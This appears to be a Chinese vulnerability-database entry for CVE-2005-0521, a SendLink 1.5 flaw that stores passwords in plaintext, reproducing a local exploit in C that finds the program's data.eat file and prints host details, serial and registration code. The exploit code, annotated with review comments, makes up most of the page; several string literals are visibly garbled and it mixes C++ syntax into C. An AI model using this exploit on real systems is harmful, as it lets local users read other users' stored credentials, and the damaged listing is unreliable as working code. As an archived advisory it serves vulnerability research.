SendLink data.eat文件敏感信息泄露漏洞
漏洞ID | 1108474 | 漏洞类型 | 未知 |
发布时间 | 2005-02-22 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2005-0521 |
CNNVD-ID | CNNVD-200502-088 |
漏洞平台 | Windows | CVSS评分 | 2.1 |
|漏洞来源
|漏洞详情
SendLink 是一款小巧便捷的网络共享软件。SendLink 1.5 将可能包含密码在内的敏感信息以纯文本格式存储在 data.eat 文件中,本地用户可读取该文件,从而获取特权。
|漏洞EXP
/*****************************************************************
SendLink v1.5 Local Exploit by Kozan
Application: SendLink v1.5
Vendor:Computer Knacks
http://www.computerknacks.com/
Vulnerable Description: SendLink v1.5 discloses passwords to local users.
Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com
*****************************************************************/
#include <windows.h>
#include <stdio.h>
#include <string.h>
/* Capacity, in bytes, of prgfiles and of the per-field key buffers in main(). */
#define BUFSIZE 100

/* Registry handle and last registry status, both written by main(). */
HKEY hKey;
LONG lRet;

/* In/out byte count handed to RegQueryValueEx; starts at the buffer capacity. */
DWORD dwBufLen = BUFSIZE;

/* Receives the ProgramFilesDir value; main() then appends the data file path. */
char prgfiles[BUFSIZE];

/* One pointer per field that main() reads through oku() and prints. */
char *hostip;
char *hostname;
char *hostport;
char *options;
char *serial;
char *regcode;
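/**
 * Find the first occurrence of a byte string in a file.
 *
 * The file is opened in binary mode and scanned from the start; the
 * comparison is byte-for-byte against the characters of Str (its NUL
 * terminator is not part of the pattern).
 *
 * @param FilePath  Path of the file to scan.
 * @param Str       NUL-terminated pattern to look for.
 * @return Byte offset of the first match, or -1 if the file cannot be
 *         opened, the pattern is NULL/empty, or no match exists.
 *         The offset is narrowed to int, as in the original interface.
 */
int adresal(char *FilePath, char *Str)
{
    FILE *di;
    size_t len;
    long start = 0;
    int offset = -1;

    if (FilePath == NULL || Str == NULL)
        return -1;

    /* An empty pattern reads nothing, so the scan loop would never advance. */
    len = strlen(Str);
    if (len == 0)
        return -1;

    /* On failure there is no stream to close; fclose(NULL) is undefined. */
    di = fopen(FilePath, "rb");
    if (di == NULL)
        return -1;

    for (;;) {
        size_t matched = 0;
        int c = 0;

        /* getc() result stays an int so EOF is distinguishable from byte 0xFF. */
        while (matched < len) {
            c = getc(di);
            if (c == EOF || c != (unsigned char)Str[matched])
                break;
            matched++;
        }

        if (matched == len) {
            offset = (int)start;
            break;
        }

        /* Fewer than len bytes were left from this start; no later start can match. */
        if (c == EOF)
            break;

        /*
         * Try the very next byte as a candidate start. After a partial match
         * the stream has run ahead, so rewind to it explicitly; skipping it
         * would miss overlapping candidates (e.g. "ab" inside "aab").
         */
        start++;
        if (matched > 0 && fseek(di, start, SEEK_SET) != 0)
            break;
    }

    fclose(di);
    return offset;
}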
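/**
 * Read the value that follows a key marker in a file.
 *
 * Locates Str with adresal(), then copies the bytes after it up to (not
 * including) the first 0xBB byte or end of file.
 *
 * @param FilePath  Path of the file to read.
 * @param Str       NUL-terminated key marker that precedes the value.
 * @return Pointer to a NUL-terminated string. On any failure (marker not
 *         found, file cannot be opened, seek error) an empty string is
 *         returned. A non-empty result lives in a static buffer: it stays
 *         valid after return but is overwritten by the next call, and values
 *         longer than the buffer are truncated.
 */
char *oku(char *FilePath, char *Str)
{
    /*
     * static, not automatic: the function returns this buffer, and returning
     * the address of an automatic array leaves the caller a dangling pointer.
     */
    static char Feature[500];
    const int delimiter = 0xBB;   /* byte that ends a stored value */
    size_t used = 0;
    FILE *di;
    int Offset;
    int c;

    if (FilePath == NULL || Str == NULL)
        return "";

    Offset = adresal(FilePath, Str);
    if (Offset == -1)
        return "";

    di = fopen(FilePath, "rb");
    if (di == NULL)
        return "";

    /* Position just past the marker, where the value starts. */
    if (fseek(di, (long)Offset + (long)strlen(Str), SEEK_SET) != 0) {
        fclose(di);
        return "";
    }

    /* Keep one byte for the terminator so a long value cannot overrun Feature. */
    while (used < sizeof Feature - 1) {
        /* int, not char: keeps EOF distinct from data and 0xBB comparable. */
        c = getc(di);
        if (c == EOF || c == delimiter)
            break;
        Feature[used++] = (char)c;
    }
    Feature[used] = '\0';

    fclose(di);
    return Feature;
}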
/*
 * Entry point of the proof of concept for the advisory above.
 *
 * Reads the ProgramFilesDir value from the registry, appends the SendLink
 * data file path to it, then calls oku() once per field (hostip, hostname,
 * hostport, options, serial, regcode) and prints what comes back. Nothing is
 * decoded or decrypted here: the values are printed as stored, which is the
 * plaintext-storage weakness the advisory describes.
 *
 * Always returns 0, including on the error paths.
 *
 * NOTE(review): several string literals in this listing look damaged by page
 * extraction -- printf formats end in a bare "n" where a newline escape was
 * presumably intended, and the registry/file path literals appear to have
 * lost their separator escapes. Treat the listing as illustrative, not as
 * verbatim source.
 * NOTE(review): try/catch is C++ syntax, so this is not valid C despite the
 * C-style headers.
 */
int main(void)
{
// Open the key read-only (KEY_QUERY_VALUE); no write access is requested.
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\Microsoft\Windows\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
// dwBufLen goes in as the capacity of prgfiles (BUFSIZE) and comes back as
// the number of bytes stored.
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE)
prgfiles, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
{
RegCloseKey(hKey);
printf("An error occured!n");
return 0;
}
RegCloseKey(hKey);
}
else
{
// NOTE(review): RegOpenKeyEx failed on this path, so hKey was never opened;
// closing it here acts on an unset handle.
RegCloseKey(hKey);
printf("An error occured!n");
return 0;
}
// NOTE(review): unbounded append into the BUFSIZE-byte prgfiles. The check
// above only ensures the registry value itself fit; nothing verifies that the
// value plus this suffix fits, or that the value came back NUL-terminated.
strcat(prgfiles,"\SendLink\User\data.eat");
printf("SendLink v1.5 Local Exploit by Kozann");
printf("Credits to ATmaCAn");
printf("www.netmagister.com - www.spyinstructors.com nn");
try
{
// Each block below builds a key marker of the form name<0xBB>=<0xAB> and asks
// oku() for the bytes that follow it in the data file; the result is printed
// immediately after the call.
char hostip_temp[BUFSIZE];
wsprintf(hostip_temp,"hostip%c=%c",0xBB,0xAB);
hostip=oku(prgfiles,hostip_temp);
printf("Host IP: %sn",hostip);
char hostname_temp[BUFSIZE];
wsprintf(hostname_temp,"hostname%c=%c",0xBB,0xAB);
hostname=oku(prgfiles,hostname_temp);
printf("Hostname : %sn",hostname);
char hostport_temp[BUFSIZE];
wsprintf(hostport_temp,"hostport%c=%c",0xBB,0xAB);
hostport=oku(prgfiles,hostport_temp);
printf("Host Port : %sn",hostport);
char options_temp[BUFSIZE];
wsprintf(options_temp,"options%c=%c",0xBB,0xAB);
options=oku(prgfiles,options_temp);
printf("Options : %sn",options);
char serial_temp[BUFSIZE];
wsprintf(serial_temp,"serial%c=%c",0xBB,0xAB);
serial=oku(prgfiles,serial_temp);
// NOTE(review): this prints hostip, not the serial value fetched just above.
printf("Serial : %sn",hostip);
char regcode_temp[BUFSIZE];
wsprintf(regcode_temp,"regcode%c=%c",0xBB,0xAB);
regcode=oku(prgfiles,regcode_temp);
printf("Registration Code : %sn",regcode);
}catch(...){ printf("An error occured!n"); return 0; }
return 0;
}
// milw0rm.com [2005-02-22]
|参考资料
来源:SECTRACK
名称:1013269
链接:http://securitytracker.com/id?1013269